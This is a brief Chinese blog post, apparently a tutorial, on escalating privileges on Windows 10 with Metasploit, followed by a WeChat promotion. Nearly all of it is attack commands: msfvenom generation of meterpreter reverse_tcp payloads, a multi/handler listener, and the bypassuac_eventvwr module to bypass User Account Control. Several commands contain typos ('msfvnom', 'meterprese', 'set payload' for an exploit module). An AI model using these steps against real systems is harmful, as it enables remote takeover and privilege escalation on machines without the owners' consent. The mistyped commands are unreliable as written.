# Metasploit Win10提权

# 查看目标主机的操作系统

a) X86操作系统

kali# msfvnom –p payload/windows/meterpreter/reverse_tcp 
1

b) X64操作系统

kali# msfvnom –p payload/windows/x64/meterpreter/reverse_tcp
1

# 使用msf建立会话

msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
1
2
3

# 提权

msf exploit(handler) > search bypassuac //使用bypassuac(绕过用户帐户控制) 
msf exploit(handler) > set payload exploit/windows/local/bypassuac_eventvwr # 在x64使用成功 
msf exploit(handler) > set payload windows/x64/meterprese/reverse_tcp 
msf exploit(handler) > show targets //查看目标,可选项,根据操作系统选择 
msf exploit(handler) > set target 1 #设置目标为x64,0:x86 
msf exploit(handler) > exploit
1
2
3
4
5
6

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!